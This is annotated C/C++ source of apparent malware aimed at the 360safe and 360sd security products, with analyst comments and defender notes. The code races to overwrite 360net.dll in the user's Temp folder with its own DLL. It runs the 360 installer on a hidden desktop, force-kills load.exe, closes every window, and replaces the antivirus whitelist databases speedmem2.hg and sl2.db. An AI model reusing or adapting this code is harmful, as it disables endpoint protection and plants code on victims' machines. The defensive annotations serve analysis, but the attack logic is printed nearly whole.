// Module-level instance handle; it is never assigned or read anywhere in this listing.
HINSTANCE hInstance = NULL;
// Worker thread (EXE side of the sample): watches the user's
// "Local Settings\Temp" directory and, when a file whose name contains
// "360net.dll" is reported as MODIFIED, overwrites it with "Dll.dll" (a
// relative path, resolved against the current working directory). This is a
// file-drop race against whatever legitimately writes 360net.dll into Temp,
// i.e. DLL planting. lpParameter is unused.
// Returns 1 when the overwrite succeeded, 0 when CopyFile failed; terminates
// the whole process if the directory cannot be opened.
// Defender notes: a non-360 process opening %USERPROFILE%\Local Settings\Temp
// with FILE_LIST_DIRECTORY + FILE_FLAG_BACKUP_SEMANTICS and looping on
// ReadDirectoryChangesW, followed by a write to a file named 360net.dll in
// that directory, is the observable sequence.
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
// Raises the entire process (not just this thread) to HIGH_PRIORITY_CLASS,
// presumably so the watcher wins the race against the writer of 360net.dll.
SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS );
char MydirPath[MAX_PATH];
// Return value is unchecked; MydirPath is used even if the lookup failed.
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
// Hard-coded XP-era profile layout; the trailing backslash is relied on by
// the lstrcat further down.
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
const int buf_size = 1024;
CHAR buf[buf_size];
DWORD dwBufWrittenSize;
HANDLE hDir;
// A directory handle with FILE_LIST_DIRECTORY and backup semantics is what
// ReadDirectoryChangesW requires.
hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
// CloseHandle on INVALID_HANDLE_VALUE is meaningless; exit(0) then ends the
// whole process, not just this thread.
CloseHandle(hDir);
exit(0);
}
while(1)
{
// Synchronous call (no OVERLAPPED), recursive over the subtree (TRUE), with
// every notification filter class enabled.
if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
FILE_NOTIFY_CHANGE_FILE_NAME|
FILE_NOTIFY_CHANGE_DIR_NAME|
FILE_NOTIFY_CHANGE_ATTRIBUTES|
FILE_NOTIFY_CHANGE_SIZE|
FILE_NOTIFY_CHANGE_LAST_WRITE|
FILE_NOTIFY_CHANGE_LAST_ACCESS|
FILE_NOTIFY_CHANGE_CREATION|
FILE_NOTIFY_CHANGE_SECURITY,
&dwBufWrittenSize, NULL, NULL))
{
// Only the first FILE_NOTIFY_INFORMATION record in buf is examined;
// NextEntryOffset and dwBufWrittenSize are never consulted, so any further
// records delivered in the same batch are dropped.
FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
char* pszMultiByte;
pszMultiByte = new char[512];
ZeroMemory( pszMultiByte, 512);
// FileNameLength is in bytes, so /2 gives the WCHAR count. The converted
// name (CP_ACP) is relative to the watched directory; the result is unchecked.
WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);
char *p;
// Substring match: any reported path containing "360net.dll" qualifies.
p=strstr(pszMultiByte,"360net.dll");
// pszMultiByte is only freed inside the branches below; when p is NULL the
// 512-byte allocation leaks on every iteration.
if(p!=NULL)
{
char tmp360net[MAX_PATH]={0};
// Unbounded copy of a 512-byte source into a MAX_PATH destination.
lstrcpy(tmp360net,pszMultiByte);
switch(pfiNotifyInfo->Action)
{
case FILE_ACTION_ADDED:
delete []pszMultiByte;
break;
case FILE_ACTION_REMOVED:
delete []pszMultiByte;
break;
case FILE_ACTION_MODIFIED:
// MyDir now becomes the full path of the reported file (unbounded lstrcat).
lstrcat(MyDir,tmp360net);
// FALSE = overwrite allowed: the freshly modified 360net.dll is replaced
// with the sample's own Dll.dll from the current directory.
if (CopyFile("Dll.dll",MyDir,FALSE)!=0)
{
delete []pszMultiByte;
CloseHandle(hDir);
return 1;
}
else
{
delete []pszMultiByte;
// Returns without closing hDir; the break below is unreachable.
return 0;
break;
}
default:
break;
}
}
}
}
// Unreachable: the while(1) loop above only exits via return.
CloseHandle(hDir);
return 0;
}
// Worker thread: creates a private desktop named "Virtual" and launches the
// command line passed in lpParameter on it, hidden (SW_HIDE). A process placed
// on a non-interactive desktop shows no UI to the logged-on user; main() uses
// this to run 360Inst.exe without the user noticing.
// Returns 1 if CreateProcess succeeded, 0 otherwise.
// Defender notes: CreateDesktop followed by CreateProcess with
// STARTUPINFO.lpDesktop set to a non-default desktop name is a recognisable
// evasion pattern. On success neither the process/thread handles nor the
// desktop are ever closed.
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
// hDesk is never checked for NULL before the desktop name is used below.
HDESK hDesk = CreateDesktop("Virtual",
NULL,
NULL,
DF_ALLOWOTHERACCOUNTHOOK, // permits hooks from other accounts on this desktop
DESKTOP_CREATEWINDOW|
DESKTOP_ENUMERATE|
DESKTOP_READOBJECTS|
DESKTOP_WRITEOBJECTS|
DESKTOP_HOOKCONTROL ,
NULL
);
STARTUPINFO si = {sizeof(si)};
// Must match the name given to CreateDesktop so the child is placed there.
si.lpDesktop = "Virtual";
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi = {0};
// lpParameter is the executable path built by the caller; it is passed as the
// (non-const) command line, which CreateProcess may modify in place.
if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
// On failure pi is still zeroed, so these CloseHandle calls receive NULL.
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseDesktop(hDesk);
return 0;
}
return 1;
}
// Entry point (EXE side of the sample). Looks up the installed 360safe via its
// App Paths registry entry, derives <360safe>\modules\360Inst.exe, then loops:
// (a) starts MainBacak to watch Temp for 360net.dll and (b) starts MainDesk to
// run 360Inst.exe on a hidden desktop, so the installer's own drop of
// 360net.dll into Temp gets overwritten with Dll.dll.
// As written, the MessageBox/ExitProcess(0) pair before the loop makes the
// process show the Temp path and exit, so everything after it is dead code
// (presumably a debug leftover).
int main(int argc, char* argv[])
{
// Uninitialised: remains garbage if neither registry key exists, and the
// RegQueryValueEx results are never checked.
char safe[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
// Native App Paths view first, then the WOW6432Node view on 64-bit Windows.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
// Installer component that MainDesk launches on the hidden desktop.
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MyDir[MAX_PATH];
SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
strcat(MyDir,"\\Local Settings\\Temp\\");
// Debug leftover: shows the Temp path and terminates. Nothing below this runs.
MessageBox(NULL,MyDir,NULL,NULL);
ExitProcess(0);
// access() with mode 0 is an existence check for the installer binary.
if (access(tmp360safe,0)==0)
{
while(1)
{
// Two-element array, but indices 1 and 2 are used below: handle[2] is out of
// bounds (undefined behaviour) and handle[0] is never assigned.
HANDLE handle[2];
// Watcher thread at highest priority; created suspended, then resumed.
handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
ResumeThread(handle[1]);
// Hidden-desktop launcher for 360Inst.exe at lowest priority, presumably so
// the watcher is already polling before the installer starts writing files.
handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
ResumeThread(handle[2]);
WaitForSingleObject(handle[2],INFINITE);
DWORD lpExitCode2;
GetExitCodeThread(handle[2],&lpExitCode2);
// MainDesk returned 0 (CreateProcess failed): retry at once. The watcher
// thread is still running and is merely abandoned here, not stopped.
if (lpExitCode2==0)
{
CloseHandle(handle[2]);
CloseHandle(handle[1]);
continue;
}
// Block until the watcher returns; it only does so after acting on a
// MODIFIED 360net.dll, otherwise this wait never ends.
WaitForSingleObject(handle[1],INFINITE);
DWORD lpExitCode;
GetExitCodeThread(handle[1],&lpExitCode);
// 1 = the overwrite succeeded; pause 15 s before the next round.
if (lpExitCode==1)
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
Sleep(15000);
}
else
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
}
}
}
return 0;
}
替换白名单数据库部分 (section: replacing the whitelist database):
// Returns a pseudo-random value in [0, count), mixing rand() (never seeded in
// this listing) with the system tick count. Used below to pick random letters
// for the staging file names so they differ from run to run.
// The multiply is performed in unsigned long (seed is promoted) and the
// remainder is truncated back to int; count must be > 0 (modulo by zero is UB).
int Storm(int count)
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%count;
return seed;
}
// EnumWindows callback: posts WM_CLOSE to every top-level window, i.e. asks
// all running applications to close (presumably to dismiss any prompt the
// security product might show — not determinable from this listing).
// Returning TRUE keeps the enumeration going; IParam is unused.
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)// callback function
{
PostMessage(hwnd, WM_CLOSE, 0, 0);
return TRUE;
}
// DLL side of the sample. The export name looks like a legitimate API so the
// DLL can be loaded in place of a real one (presumably as the Dll.dll that
// MainBacak plants as 360net.dll — TODO confirm). Once invoked it replaces
// two 360 data files — deepscan\speedmem2.hg under the 360safe directory and
// sl2.db under the 360sd directory — with copies it writes itself; the page's
// section heading calls this "replacing the whitelist database".
// speedmemSaveFile/sdSaveFile are not in this listing (presumably they write
// embedded data to the given path — TODO confirm).
// Defender notes: the observable indicators are a taskkill of load.exe via
// WinExec, WM_CLOSE broadcast to every window, App Paths lookups for
// 360safe.exe/360sd.exe, randomly named *.hg/*.ds files appearing briefly in
// Temp, and a non-360 process deleting and rewriting speedmem2.hg / sl2.db.
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
char taskkill[MAX_PATH];
// wsprintf with a constant format; a plain string literal would do.
wsprintf(taskkill,"taskkill /im load.exe /f");
// Hidden console: force-terminates load.exe (its role is not visible here).
WinExec(taskkill,SW_HIDE);
EnumWindows(EnumWindowsProc,0);
// Both uninitialised; remain garbage if the registry lookups fail, and the
// RegQueryValueEx results are never checked.
char safe[MAX_PATH];
char SD[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
DWORD buffSize1=sizeof(SD);
// 360safe install path: native App Paths view, then the WOW6432Node view.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
// Same lookup for 360sd.exe.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
// Built but never used in this function.
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
// Hard-coded XP-era profile layout; note the trailing backslash.
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
CHAR speedmem[MAX_PATH];
// Staging file names with two random letters each. MyDir already ends in a
// backslash, so the resulting path contains a doubled separator.
wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26));
CHAR slD[MAX_PATH];
wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26));
// Write the replacement data into the staging files (defined elsewhere).
speedmemSaveFile(speedmem);
sdSaveFile(slD);
CHAR Newspeedmem[MAX_PATH];
// Destination paths inside the 360safe and 360sd install directories, built
// from the unchecked registry values above.
wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe);
CHAR NewslD[MAX_PATH];
wsprintf(NewslD,"%s\\sl2.db",SD);
// Delete-then-copy replacement of the two data files; no return value is checked.
DeleteFile(Newspeedmem);
DeleteFile(NewslD);
CopyFile(speedmem,Newspeedmem,FALSE);
CopyFile(slD,NewslD,FALSE);
// Remove the staging copies from Temp.
DeleteFile(speedmem);
DeleteFile(slD);
return;
}